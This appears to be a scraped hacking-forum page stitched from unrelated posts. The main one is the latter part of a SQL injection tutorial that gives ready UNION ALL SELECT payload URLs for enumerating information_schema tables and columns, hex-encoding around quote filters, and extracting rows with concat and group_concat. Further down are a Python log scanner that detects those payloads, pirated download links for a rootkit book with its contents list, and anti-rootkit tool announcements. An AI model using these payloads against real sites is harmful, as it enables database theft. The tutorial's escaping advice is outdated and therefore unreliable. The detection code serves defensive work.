The UNION ALL SELECT doesn't replace the first SELECT, so in some cases (depending on the PHP code) we have to cause a select that will select nothing first. What we can do then is put something like 99999 instead of 17. This will return nothing because article NR 99999 doesn't exist (just make sure 99999 really does not exist). But the union all select will return 1,2,3 and this will be printed to the page instead.

Our page now outputs "2" as subject and "3" as article text.
We can now find out what version they are running. This is how you do that:
Evilzone - Hacking and Security Community - Index

Now the text ("3") will be replaced with the information about what version they are running.
If the version query returns 5.*** then you can skip the next block of text; if it returns 4.*** read this:
In MySQL version 4 they did not have the database called 'information_schema', which in V5 contains all information about all tables and columns (names, ids and more). That means in V4 it is impossible to find out the table and column names; the only way to then get any data out is by guessing the table/column names, which is time consuming and may create a lot of logs... If you wish to continue the injection, you should read through the rest and then understand how to guess the names. There are programs to brute force the table and column names.

-------------------------------------------
Okay, before we continue now, I just want to get something off my chest. If you are getting errors from even trying to UNION ALL SELECT anything, and are either getting error messages that say something like "wrong type" or something like that, or are just getting a blank page/redirection:
If the table of the first SELECT command in a query you are trying to UNION ALL SELECT is built in such a way that, let's say, the first two columns are set to be numbers and the last one is set to be a text value (I am using 3 columns because that's what we are dealing with here), you have to follow that pattern in the UNION ALL SELECT command too. So if the first SELECT is 2 columns of type number and then a text column, your UNION ALL SELECT command has to be alike (UNION ALL SELECT 1,2,'text'). Which means for us that we cannot use the 2 number in the query to get text information from the SQL server.
But we will continue this tutorial as if the columns we are using won't create any errors.
-------------------------------------------

We can now "ask" the database 'information_schema' for the column names.
The 'information_schema' database contains a table called 'tables' and a table called 'columns'.
The table 'tables' inside the database information_schema contains information about all the tables within all the databases on the server. So to find table names you can "ask" the table 'tables' in the database 'information_schema'.
The table 'columns' in the database 'information_schema' contains information about all the columns inside all the tables in all the databases on the server. So to get column names you can "ask" the table 'columns' in the database 'information_schema'.
Note: The table 'columns' in 'information_schema' also contains table names, therefore we can get both column and table names with one query if we want to.

But before we can ask the 'columns' table for column names we need to know what table we want to extract information from. You do that by asking the table 'tables' in the database 'information_schema' for table names. But when doing this without any more requirements than just "give me everything" to the SQL server, it will return ALL table names in the entire server. And that can be a lot on large servers. So.. We need to specify our question to the table a bit better.

To get all table names in a specific database you do this:
Code:
Evilzone - Hacking and Security Community - Index'

This will ask the table 'tables' in 'information_schema' for all table names where the database name is 'DatabaseName'. Remember, databases consist of tables, so each table will always have an owner database.

To ask it for all table names in the current database, the one already used by the original query, you do this:
Code:
Evilzone - Hacking and Security Community - Index
to code tag them because they fucked up the formatting)

The variable database() represents the database in use by the first SELECT command in the query.
TIP: schema means database

Again, before we continue now, I have to make an important note.
If your injections are failing when you have 's or "s in them, you have to convert your arguments to HEX. A lot of things in MySQL can be represented as HEX instead. When you want to represent things as HEX you simply remove the 's or "s and put 0xHEX_NUMBERS instead. The 0x will indicate to the MySQL server that the value is a HEX string.
Here is the above link that contained 's in HEX version:
Code:
Evilzone - Hacking and Security Community - Index

An excellent online text to HEX converter: Convert String To Hexadecimal Online

Continuing...
Now, where the number "3" was, or where originally the article text was, it should now be a table name. Let's say this database contains the tables:
Quote:
articles
users
log

Then you should see 'articles' because it is the first table.
Okay, so we know the database got a table called 'articles'; let's check that one out. Now we need to get the column names for the table 'articles'.
To get the column names of a table you do this:
Code:
Evilzone - Hacking and Security Community - Index'

Note the 's in the query, remember what I wrote about 's and HEX.
Okay, let's break it down a bit. Now we have used the UNION ALL SELECT command and we asked the database 'information_schema' if it got a table called 'columns', and it did, so we asked the table 'columns' if it could give us all the names of the columns in the table called 'articles'.
BTW, the concat() will return everything inside it as a merged value. Example: concat('h', 'e', 'll', 'o') will return hello. Concat() is not needed in this query but it's a good idea to learn how to use it, as you will need it later.

The place where the number "3" used to be, or the place where the article text is when using the page normally, should now have a name in it. In this case it should have the value 'ID'. This is because the column name 'ID' is the first column in the table 'articles'. So now we know one of the column names in the table.
To get the rest we have to use the LIMIT command. The LIMIT command will return a limited/selected amount of rows from a table.
Example: We got a table with only one column, the column is called ID. We got 10 rows:
 ____
|ID_|
|_1_|
|_2_|
|_3_|
|_4_|
|_5_|
|_6_|
|_7_|
|_8_|
|_9_|
|_10|

If we do:
Code:
SELECT * FROM TheTableAbove LIMIT 0,5
It will return the rows 1 to 5

If we do:
Code:
SELECT * FROM TheTableAbove LIMIT 5,5
It will return the rows 5 to 10

Now, back to getting the column names. Let's try to get column name NR 2; NR 1 is 'ID', we got that from the previous query.
Code:
Evilzone - Hacking and Security Community - Index

This should return the name 'subject'. This is because the column 'subject' is column NR 2. So by limiting the result from result 1 (0 is the first) and then giving us the next 1 result(s) we get 'subject'.
To get the last column name we limit it 2,1.
Code:
Evilzone - Hacking and Security Community - Index

This should return 'text'. Again this is because we now are limiting the results from the server by row NR 2 and asking for the 1 next result(s).

Alright, so the situation is:
We want to check out a table called 'articles'. We got the table name from asking the table 'tables' in the database 'information_schema'.
The table 'articles' got these columns: ID | subject | text
We got the column names from asking the table 'columns' in the database 'information_schema' for all column names in the table 'articles'.

Now! All we need to do is extract what we want. Although this table is 99% likely not interesting at all, we are now gonna try to extract all the info out of article NR 23; this is because we act like that article is for admins only, but we want to read it anyway.
To extract information you do like this:
Code:
Evilzone - Hacking and Security Community - Index, subject, text)+FROM+articles+WHERE+ID=23

Now you will see an almost normal looking article, however the subject will still be "2".
But the text will now look like this (let's say that the subject is "admin passwords" and the text is "abcabcabc"):
Quote:
23admin passwordsabcabcabc

This is because we asked for the ID which is 23, then the subject which is "admin passwords" and then the text which is "abcabcabc". This is a bit messy.. So let's try to clean things up by splitting the 3 columns with a '<br /><br />':
Code:
http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(ID,'<br /><br/>',subject,'<br /><br />',text,'<br /><br />')+FROM+articles+WHERE+ID=23
(Remember the HEX thing? Most likely you will have to use that here.)
HEX version:
Code:
Evilzone - Hacking and Security Community - Index

Now you will see this:
Quote:
23
admin passwords
abcabcabc

I know this information wasn't all that interesting but this is basically how you do it!
Let's say you want to check if the database got a user information table. Then you simply use the limit command on the:
Quote:
http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema='DatabaseName'
OR
Quote:
http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()

And repeat the whole process all over again.

Okay. I have a confession to make. The method you guys learned now is the very hard way. But I wanted you to know how to do it that way because sometimes it's necessary. And I know you would have just skipped to the easy version if I told you earlier.

Until now we have used the concat() function to group up different columns into one. But this does not limit the amount of rows the SQL server returns. So (depending on the PHP code) we will only get the first row of the returned results printed to the page. Depending on the PHP code, if it is coded in such a way that it will only output the first row or if it will loop through all the rows and print them out.
Either way, I will introduce you to a new function: the group_concat() function. This will not only allow you to group up multiple columns and values into one, but also group up rows so you don't have to use the LIMIT at the end and send a million requests. However, I must warn you. The group_concat default max length is only 1024 characters. That's why it's very often necessary doing it the hard way, with LIMIT. If the returned value is more than 1024 characters the rest will just be discarded. Nonetheless. This is how you do it:

Remember the 'article' table from above? Well, let's try getting all its column names from the 'information_schema.columns' instead of doing LIMIT:
Code:
Evilzone - Hacking and Security Community - Index'

This should now return as:
Quote:
ID,subject,text

Now we have gotten the same amount of information that we had to send three requests for last time in one request! This method can be used in all the other queries above too.

1.5 Securing vulnerabilities

What every PHP coder (and any other web page coder) should ALWAYS do: strip/check/secure ALL user inputs!
Instead of doing:
Code:
$variable = $_GET['Some_user_input_name'];
Do:
Code:
$variable = mysql_real_escape_string($_GET['Some_user_input_name']);

The mysql_real_escape_string() function will prohibit any escape character (' or " or \ etc) from doing any damage. And therefore an injection is impossible. And remember to use ' around the variable like this:
Code:
db_query("SELECT * FROM Somewere WHERE Something='" . $variable . "'");

Use of the is_numeric() function where the inputs are always going to be numbers either way is also a good idea. And also check the number length; your number should never be so high that it starts using e's (51.315+315e). So a simple if ($num > 99999999999) { die(); } will work fine.

Other inputs are:
Quote:
$_POST['']
$_COOKIE['']
$_FILES['']
$_REQUEST['']
$_SESSION['']

It is so god damn easy so why people do not do it is a mystery to me.
Source: SQL Injection
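As an added example (not part of the original post or of the evilzone tutorial), here is a Python scanner that looks for the probing and extraction patterns the tutorial walks through in web-server access-log lines, and also flags when a flagged request's response size differs from the client's last clean request to the same path, which is the server-side view of the "blank page instead of the article" signal. The log lines and IP addresses are constructed.

```python
"""Detect the SQL-injection probing and extraction patterns walked through
above (error prefixes, ORDER BY / OR / AND probes, UNION ALL SELECT,
information_schema lookups, concat()/group_concat(), 0x hex literals) in
web-server access logs. Added example, not part of the original post; the
log lines are constructed and the IP addresses are documentation ranges."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined log format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Each rule runs against the URL-decoded parameter value, i.e. what the PHP
# code (and the database) sees after $_GET decoding.
RULES = [
    # a lone ', ", \, /*, -- or ; at the end of the value: the syntax-error probes
    ("error_prefix",   re.compile(r"""(['"\\]|/\*|--|;)\s*$""")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    # or 1=1, and 1=2, or 'a'='a: the tautology / extra-condition probes
    ("tautology",      re.compile(r"""\b(or|and)\s+(\d+|'[^']*'|"[^"]*")\s*=""", re.I)),
    ("union_select",   re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_lookup",  re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("concat_call",    re.compile(r"\b(group_)?concat\s*\(", re.I)),
    # 0x... standing in for a quoted string, as in table_schema=0x4461...
    ("hex_literal",    re.compile(r"\b0x[0-9a-f]{4,}\b", re.I)),
]
# Tags that mean data is being pulled out, not merely the page being probed.
EXTRACTION = {"union_select", "schema_lookup", "concat_call"}


def decode_params(target):
    """(name, value) query pairs of a request target, decoded a second time so
    %2527-style double-encoded quotes are seen as a quote too."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [(name, unquote_plus(value)) for name, value in pairs]


def classify_value(value):
    """Names of every rule that matches the decoded value (empty if clean)."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_log(lines):
    """Walk the log in order and return one finding per suspicious request.

    response_changed compares the response size with the last clean request
    the same client made to the same path: the "blank page or error instead
    of the article" signal the tutorial relies on, seen from the server side.
    """
    baseline = {}  # (ip, path) -> size of that client's last clean response
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        ip, target = m.group("ip"), m.group("target")
        path = urlsplit(target).path
        size = int(m.group("size")) if m.group("size").isdigit() else 0
        flagged = {name: tags for name, value in decode_params(target)
                   if (tags := classify_value(value))}
        if not flagged:
            baseline[(ip, path)] = size
            continue
        all_tags = {tag for tags in flagged.values() for tag in tags}
        findings.append({
            "ip": ip, "path": path, "status": m.group("status"),
            "params": flagged,
            "stage": "extraction" if all_tags & EXTRACTION else "probe",
            "response_changed": size != baseline.get((ip, path), size),
        })
    return findings


# Constructed sample: one client working through the tutorial's steps against
# /index.php?id=17, plus two benign requests that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2012:14:03:11 +0000] "GET /index.php?id=17 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jan/2012:14:03:19 +0000] "GET /index.php?id=17%27 HTTP/1.1" 200 812',
    '203.0.113.5 - - [10/Jan/2012:14:03:40 +0000] "GET /index.php?id=17+order+by+1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jan/2012:14:03:52 +0000] "GET /index.php?id=17+order+by+99999 HTTP/1.1" 200 812',
    '203.0.113.5 - - [10/Jan/2012:14:04:07 +0000] "GET /index.php?id=-1+or+1=1 HTTP/1.1" 200 9800',
    '203.0.113.5 - - [10/Jan/2012:14:05:30 +0000] "GET /index.php?id=99999+UNION+ALL+SELECT+1,2,'
    'concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=0x4461746162617365 HTTP/1.1" 200 5200',
    '198.51.100.7 - - [10/Jan/2012:14:05:41 +0000] "GET /index.php?page=contact HTTP/1.1" 200 4100',
    '198.51.100.7 - - [10/Jan/2012:14:06:02 +0000] "GET /search.php?q=O%27Reilly HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['stage']:<10} "
              f"changed={f['response_changed']} {f['params']}")
```

The order-by-1 request is flagged but its response size matches the baseline, while the quote, order-by-99999 and tautology requests all change the size; the apostrophe in O'Reilly is not a trailing prefix and stays clean.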
16. The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System
Reverend Bill Blunden

Contents

Preface: Metadata

Part I - Foundations

Chapter 1 Setting the Stage
1.1 Forensic Evidence
1.2 First Principles
  Semantics
  Rootkits: The Kim Philby of System Software
  Who Is Using Rootkit Technology?
  The Feds
  The Spooks
  The Suits
1.3 The Malware Connection
  Infectious Agents
  Adware and Spyware
  Rise of the Botnets
  Malware versus Rootkits
  Job Security: The Nature of the Software Industry
1.4 Closing Thoughts

Chapter 2 Into the Catacombs: IA-32
2.1 IA-32 Memory Models
  Physical Memory
  Flat Memory Model
  Segmented Memory Model
  Modes of Operation
2.2 Real Mode
  Case Study: MS-DOS
  Isn't This a Waste of Time? Why Study Real Mode?
  The Real-Mode Execution Environment
  Real-Mode Interrupts
  Segmentation and Program Control
  Case Study: Dumping the IVT
  Case Study: Logging Keystrokes with a TSR
  Case Study: Hiding the TSR
  Case Study: Patching the tree.com Command
  Synopsis
2.3 Protected Mode
  The Protected-Mode Execution Environment
  Protected-Mode Segmentation
  Protected-Mode Paging
  Protected-Mode Paging: A Closer Look
2.4 Implementing Memory Protection
  Protection through Segmentation
  Limit Checks
  Type Checks
  Privilege Checks
  Restricted-Instruction Checks
  Gate Descriptors
  Protected-Mode Interrupt Tables
  Protection through Paging
  Summary

Chapter 3 Windows System Architecture
3.1 Physical Memory
  Physical Address Extension (PAE)
  Data Execution Prevention (DEP)
  Address Windowing Extensions (AWE)
  Pages, Page Frames, and Page Frame Numbers
3.2 Memory Protection
  Segmentation
  Paging
  Linear to Physical Address Translation
  Longhand Translation
  A Quicker Approach
  Another Quicker Approach
3.3 Virtual Memory
  User Space Topography
  Kernel Space Dynamic Allocation
  Address Space Layout Randomization (ASLR)
3.4 User Mode and Kernel Mode
  How versus Where
  Kernel-Mode Components
  User-Mode Components
3.5 The Native API
  The IVT Grows Up
  Hardware and the System Call Mechanism
  System Call Data Structures
  The SYSENTER Instruction
  The System Service Dispatch Tables
  Enumerating the Native API
  Nt*() versus Zw*() System Calls
  The Life Cycle of a System Call
  Other Kernel-Mode Routines
  Kernel-Mode API Documentation
3.6 The Boot Process
  Startup for BIOS Firmware
  Startup for EFI Firmware
  The Windows Boot Manager
  The Windows Boot Loader
  Initializing the Executive
  The Session Manager
  Wininit.exe
  Winlogon.exe
  The Major Players
3.7 Design Decisions
  How Will Our Rootkit Execute at Run Time?
  What Constructs Will Our Rootkit Manipulate?

Chapter 4 Rootkit Basics
4.1 Rootkit Tools
  Development Tools
  Diagnostic Tools
  Reversing Tools
  Disk Imaging Tools
  Tool Roundup
4.2 Debuggers
  Configuring Cdb.exe
  Symbol Files
  Windows Symbols
  Invoking Cdb.exe
  Controlling Cdb.exe
  Useful Debugger Commands
  Examine Symbols Command (x)
  List Loaded Modules (lm and !lmi)
  Display Type Command (dt)
  Unassemble Command (u)
  Display Command (d*)
  Registers Command (r)
  The Kd.exe Kernel Debugger
  Different Ways to Use a Kernel Debugger
  Configuring Kd.exe
  Preparing the Hardware
  Preparing the Software
  Launching a Kernel Debugging Session
  Controlling the Target
  Useful Kernel-Mode Debugger Commands
  List Loaded Modules Command (lm)
  !process
  Registers Command (r)
  Working with Crash Dumps
  Method 1
  Method 2
  Crash Dump Analysis
4.3 A Rootkit Skeleton
  Kernel-Mode Driver Overview
  A Minimal Rootkit
  Handling IRPs
  DeviceType
  Function
  Method
  Access
  Communicating with User-Mode Code
  Sending Commands from User Mode
  Source Code Organization
  Performing a Build
  WDK Build Environments
  Build.exe
4.4 Loading a KMD
  The Service Control Manager (SCM)
  Using sc.exe at the Command Line
  Using the SCM Programmatically
  Registry Footprint
  ZwSetSystemInformation()
  Writing to the \Device\PhysicalMemory Object
  Modifying Driver Code Paged to Disk
  Leveraging an Exploit in the Kernel
4.5 Installing and Launching a Rootkit
  Launched by the Operating System
  Launched by a User-Mode Application
  Use the SCM
  Use an Auto-Start Extensibility Point (ASEP)
  Install the Launcher as an Add-On to an Existing Application
  Defense in Depth
  Kamikaze Droppers
  Rootkit Uninstall
4.6 Self-Healing Rootkits
  Auto-Update
4.7 Windows Kernel-Mode Security
  Kernel-Mode Code Signing (KMCS)
  Kernel Patch Protection (KPP)
  Restricted Access to \Device\PhysicalMemory
4.8 Synchronization
  Interrupt Request Levels
  Deferred Procedure Calls (DPCs)
  Implementation
4.9 Commentary

Part II - System Modification

Chapter 5 Hooking Call Tables
5.1 Hooking in User Space: The IAT
  DLL Basics
  Accessing Exported Routines
  Load-Time Dynamic Linking
  Run-Time Dynamic Linking
  Injecting a DLL
  The AppInit_DLLs Registry Value
  The SetWindowsHookEx() API Call
  Using Remote Threads
  PE File Format
  The DOS HEADER
  RVAs
  The PE Header
  Walking through a PE on Disk
  Hooking the IAT
5.2 Hooking in Kernel Space
  Hooking the IDT
  Handling Multiple Processors - Solution 1
  Naked Routines
  Issues with Hooking the IDT
  Hooking Processor MSRs
  Handling Multiple Processors - Solution 2
  Hooking the SSDT
  Disabling the WP Bit - Technique 1
  Disabling the WP Bit - Technique 2
  Hooking SSDT Entries
  SSDT Example: Tracing System Calls
  SSDT Example: Hiding a Process
  SSDT Example: Hiding a Directory
  SSDT Example: Hiding a Network Connection
  Hooking IRP Handlers
  Hooking the GDT - Installing a Call Gate
5.3 Hooking Countermeasures
  Checking for Kernel-Mode Hooks
  Checking IA32_SYSENTER_EIP
  Checking INT 0x2E
  Checking the SSDT
  Checking IRP Handlers
  Checking for User-Mode Hooks
  Parsing the PEB - Part 1
  Parsing the PEB - Part 2
5.4 Counter-Countermeasures

Chapter 6 Patching System Routines
  Binary Patching versus Run-time Patching
  The Road Ahead
6.1 Run-time Patching
  Detour Patching
  Detour Jumps
  Example 1: Tracing Calls
  Detour Implementation
  Acquire the Address of the NtSetValueKey()
  Initialize the Patch Metadata Structure
  Verify the Original Machine Code against a Known Signature
  Save the Original Prolog and Epilog Code
  Update the Patch Metadata Structure
  Lock Access and Disable Write Protection
  Inject the Detours
  The Prolog Detour
  The Epilog Detour
  Post-Game Wrap-Up
  Example 2: Subverting Group Policy
  Detour Implementation
  Initializing the Patch Metadata Structure
  The Epilog Detour
  Mapping Registry Values to Group Policies
  Example 3: Granting Access Rights
  Detour Implementation
6.2 Binary Patching
  Subverting the Master Boot Record
  The MBR in Depth
  The Partition Table
  Patch or Replace?
  Hidden Sectors
  Bad Sectors and Boot Sectors
  Rogue Partition
  MBR Loader
  IA-32 Emulation
  Vbootkit
6.3 Instruction Patching Countermeasures

Chapter 7 Altering Kernel Objects
7.1 The Cost of Invisibility
  Issue 1: The Steep Learning Curve
  Issue 2: Concurrency
  Issue 3: Portability and Pointer Arithmetic
  Branding the Technique: DKOM
  Objects?
7.2 Revisiting the EPROCESS Object
  Acquiring an EPROCESS Pointer
  Relevant Fields in EPROCESS
  UniqueProcessId
  ActiveProcessLinks
  Token
  ImageFileName
7.3 The DRIVER_SECTION Object
7.4 The TOKEN Object
  Authorization on Windows
  Locating the TOKEN Object
  Relevant Fields in the TOKEN Object
7.5 Hiding a Process
7.6 Hiding a Driver
7.7 Manipulating the Access Token
7.8 Using No-FU
7.9 Countermeasures
  Cross-View Detection
  High-Level Enumeration: CreateToolhelp32Snapshot()
  High-Level Enumeration: PID Bruteforce
  Low-Level Enumeration: Processes
  Low-Level Enumeration: Threads
  Related Software
  Field Checksums
  Counter-Countermeasures
7.10 Commentary: Limits of the Two-Ring Model
7.11 The Last Lines of Defense

Chapter 8 Deploying Filter Drivers
8.1 Filter Driver Theory
  Driver Stacks and Device Stacks
  The Lifecycle of an IRP
  Going Deeper: The Composition of an IRP
  IRP Forwarding
  IRP Completion
8.2 An Example: Logging Keystrokes
  The PS/2 Keyboard Driver and Device Stacks
  Lifecycle of an IRP
  Implementation
8.3 Adding Functionality: Dealing with IRQLs
  Dealing with the Elevated IRQL
  Sharing Nicely: The Global Buffer
  The Worker Thread
  Putting It All Together
8.4 Key Logging: Alternative Techniques
  SetWindowsHookEx
  GetAsyncKeyState
8.5 Other Ways to Use Filter Drivers

Part III - Anti-Forensics

Chapter 9 Defeating Live Response
  IDS, IPS, and Forensics
  Anti-Forensics
  Data Destruction
  Data Hiding
  Data Transformation
  Data Contraception
  Data Fabrication
  File System Attacks
9.1 The Live Incident Response Process
  The Forensic Investigation Process
  Collecting Volatile Data
  Performing a Port Scan
  Collecting Nonvolatile Data
  The Debate over Pulling the Plug
  Countermeasures
9.2 RAM Acquisition
  Software-Based Acquisition
  KnTDD.exe
  Autodump+
  LiveKd.exe
  Crash Dumps
  Hardware-Based Acquisition
  Countermeasures

Chapter 10 Defeating File System Analysis
10.1 File System Analysis
  Forensic Duplication
  Recovering Deleted Files
  Enumerating ADSes
  Acquiring File Metadata
  Removing Known Good Files
  File Signature Analysis
  Static Analysis of an Unknown Executable
  Run-time Analysis of an Unknown Executable
10.2 Countermeasures: Overview
10.3 Countermeasures: Forensic Duplication
  Reserved Disk Regions
  Live Disk Imaging
10.4 Countermeasures: Deleted File Recovery
10.5 Countermeasures: Acquiring Metadata
  Altering Timestamps
  Altering Checksums
10.6 Countermeasures: Removing Known Files
  Move Files into the "Known Good" List
  Introduce "Known Bad" Files
  Flood the System with Foreign Binaries
  Keep Off a List Entirely by Hiding
  Out-of-Band Hiding
  In-Band Hiding
  Application Layer Hiding: M42
10.7 Countermeasures: File Signature Analysis
10.8 Countermeasures: Executable Analysis
  Foiling Static Executable Analysis
  Cryptors
  Encryption Key Management
  Packers
  Augmenting Static Analysis Countermeasures
  Foiling Run-time Executable Analysis
  Attacks against the Debugger
  Breakpoints
  Detecting a User-Mode Debugger
  Detecting a Kernel-Mode Debugger
  Detecting a User-Mode or Kernel-Mode Debugger
  Detecting Debuggers via Code Checksums
  Land Mines
  Obfuscation
  Obfuscating Application Data
  Obfuscating Application Code
  The Hidden Price Tag
10.9 Borrowing Other Malware Tactics
  Memory-Resident Rootkits
  Data Contraception
  The Tradeoff: Footprint versus Failover

Chapter 11 Defeating Network Analysis
. . . . . . . 11 .1 Worst-Case Scenario: Full Content Data Capture .... 11 .2 Tunneling: An Overview . HTTP. DNS ........ . ICMP ....... . Peripheral Issues . 11.3 The Windows TCPIIP Stack Windows Sockets 2 . Raw Sockets . . . . . Winsock Kernel API . NDIS ...... . . . Different Tools for Different Jobs. 11 .4 DNS Tunneling. DNS Query . ... ....... . DNS Response . . . . . . . . . . 11.5 DNS Tunneling: User Mode ... 11 .6 DNS Tunneling: WSK Implementation. Initialize the Application's Context. .. Create a Kernel-Mode Socket . .... Determine a Local Transport Address . Bind the Socket to the Transport Address. Set the Remote Address (the C2 Client). Send the DNS Query . . . . Receive the DNS Response. . . . . . . . 11.7 NDIS Protocol Drivers . . . . . . . . . . Building and Running the NDISProt 6.0 Example. An Outline of the Client Code An Outline of the Driver Code The ProtocolxxxO Routines. Missing Features. . . . . . . . · 589 .590 .590 · 591 · 592 . 595 . 596 . 596 · 597 . 599 . . . . 603 . . . . . 604 . 605 .606 .607 .607 .609 · 610 .611 · 612 · 613 · 614 · 616 · 617 · 617 · 619 · 621 · 625 .632 .632 · 634 · 635 · 636 . 638 .639 · 641 · 642 . 646 .649 .652 .656 Chapter 12 Countermeasure Summary . . . 12.1 Live Incident Response . 12.2 File System Analysis . . 12.3 Network Traffic Analysis 12.4 Why Anti-Forensics? .. Port IV - End Material Chapter 13 Chapter 14 Appendix The Tao of Rootkits . . . . . . . Run Silent, Run Deep . . . . . . Development Mindset. . . . . . On Dealing with Proprietary Systems . Staking Out the Kernel . . . . . . . . . Walk before You Run: Patching System Code . Walk before You Run: Altering System Data Structures The Advantages of Self-Reliant Code Leverage Existing Work Use a Layered Defense .. . .. . Study Your Target . . . . . . . . . Separate Mechanism from Policy . Closing Thoughts . . . . . . . . . . . . . Chapter 2 ..... . . Project: KillDOS. . Project: HookTSR . Project: HideTSR . Project: Patch Chapter 3 . SSDT .. . . 
Chapter 4 ... . Project: Skeleton (KMD Component). Project: Skeleton (User-Mode Component) Project: Installer . Project: Hoglund. . . . . . . . . . . Project: SD .... . . .. .. .. . . Project: HBeat (Client and Server) . Project: IRQL . . . . . . Chapter 5 . ..... . . . . Project: RemoteThread . Contents · . . . 659 .660 . 662 . 663 .664 · .. . 669 . 669 . 670 · 670 .671 · 672 ... 672 · 673 · 675 · 675 . 676 · 676 · .. . 677 . 683 . 683 . 684 · 691 . 696 . 697 . 697 .710 · 710 · 714 · 721 . 724 .726 · 729 . 736 . 739 · 739 xv Contents xvi Project: ReadPE .. .. . ..... . .. .... ... 741 Project: HookIAT . . .... ... . . 746 Project: HookIDT . . . . . . . 750 Project: HookSYS . . . . . . . 756 Project: HookSSDT . . 760 Project: HookIRP . . . . . . . . . . 772 Project: HookGDT . .. ... . .. . 774 Project: AntiHook (Kernel Space and User Space) . . . . . . . . 779 Project: ParsePEB. . . . . . . . . . . . . . . . . . . . .. . . 790 Chapter 6 . . . . . . . . . . . . . . . . . . . . . . . . . . .. .. 793 Project: TraceDetour . . . . . 793 Project: GPO Detour . . . . . . . . 801 Project: AccessDetour. . . . . . . . . . 804 Project: MBR Disassembly . . . . . . . . . . . . 811 Project: LoadMBR. . . . . . . . . . . . . . . . . 813 Chapter 7 . . . . . . . . . . . .. ... .. .. . ... . .... 816 Project: No-FU (User-Mode Portion) .. .... . .... . .. . 816 Project: No-FU (Kernel-Mode Portion) . ... ... ....... 821 Project: TaskLister . . . 834 Project: findFU . . . . .. ... ............... . 838 Chapter 8 . . . . . . . . . .. .. ..... ...... . ... . . 843 Project: KiLogr-VOl . . . . .. . . . . .... . 843 Project: KiLogr-V02. . . .. ... .. . ..... 847 Chapter 10 . . . . . . . . . .. . . . .. . . . . . . 854 Project: TSMod . . . . . . . . . . 854 Project: Slack .. . . . . . . . . . 858 Project: MFT . . . . . . . . . . 860 Project: Cryptor . .. . . . . . . . . 871 Chapter 11 . . . .. .. . . . . . . . . 876 Project: UserModeDNS . . 876 Project: WSK-DNS . ....... . .... ... .. ... . .. 
883 Index . ............. . . .. . 895 Download: http://www.mediafire.com/?7jl44499d94l3l9 http://www.megaupload.com/?d=C4TS6FFB Stiu ca mai e postata pe undeva pe aici, dar link-ul nu mai e valid iar cartea asta se merita descarcata.
  17. [h=3]RootRepeal - New Rootkit Detector Tool[/h]

RootRepeal is a new kernel-land based anti-rootkit tool which is simple to use yet powerful. Currently it is in beta and as of now supports only x86 systems.

Main features:

Driver Scan - scans the system for kernel-mode drivers. Displays all drivers currently loaded, shows whether a driver has been hidden, and whether the driver's file is visible on disk.
Files Scan - scans any fixed drive on the system for hidden, locked or falsified files.
Processes Scan - scans the system for processes. Displays all processes currently running and shows whether a process is hidden or locked.
SSDT Scan - shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked.
Stealth Objects Scan - attempts to determine whether any rootkits are active by looking for typical symptoms.
Hidden Services Scan - scans for hidden system services.
Shadow SSDT Scan - counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions.

Due to the nature of these kinds of tools, you are always advised to have backups of all important data before running it. It is also advisable to run it in a virtual machine such as VMware. For more details, and to test it yourself, visit the project page of RootRepeal.

Download: http://ad13.geekstogo.com/RootRepeal.rar

Source: SecurityXploded Forum • View topic - RootRepeal - New Rootkit Detector Tool
  18. [h=3]Anti-Rootkit Tool - Tuluka Kernel Inspector[/h]

Here is the new anti-rootkit tool "Tuluka Kernel Inspector" by Libertad from Tuluka.org. It has the following core features:

Detects hidden processes, drivers and devices
Detects IRP hooks
Identifies the substitution of certain fields in the DRIVER_OBJECT structure
Checks driver signatures
Detects and restores SSDT hooks
Detects suspicious descriptors in the GDT
IDT hook detection
SYSENTER hook detection
Displays the list of system threads and allows you to suspend them
IAT and inline hook detection
Shows the actual values of the debug registers, even if reading these registers is controlled by someone
Allows you to find the system module by an address within that module
Allows you to display the contents of kernel memory and save it to disk
Allows you to dump kernel drivers and the main modules of all processes
Allows you to terminate any process
Is able to disassemble interrupt and IRP handlers, system services, start routines of system threads and many more
Allows you to build the stack for a selected device
Many more...

It has been tested on the following operating systems (32-bit):

Windows XP SP0 SP1 SP2 SP3
Windows Server 2003 SP0 SP1 SP2 R2
Windows Vista SP0 SP1 SP2
Windows Server 2008 SP0 SP1 SP2
Windows 7 SP0 SP1

Though it currently supports only the 32-bit version, support for 64-bit is expected in upcoming versions.

You can download it from here: http://www.tuluka.org/Download.html

Source: SecurityXploded Forum • View topic - New Anti-Rootkit Tool - Tuluka Kernel Inspector
  19. Hidden Rootkit Process Detection

Contents

Introduction to Rootkits
Userland Rootkits & their Hidden Operations
Hidden Userland Rootkit Process Detection Methods
  HPD using Direct NT System Call Implementation
  HPD using PIDB (Process ID Bruteforce) method
  HPD with CSRSS Process Handle Enumeration
Other Methods of Detecting Hidden Processes

Introduction to Rootkits

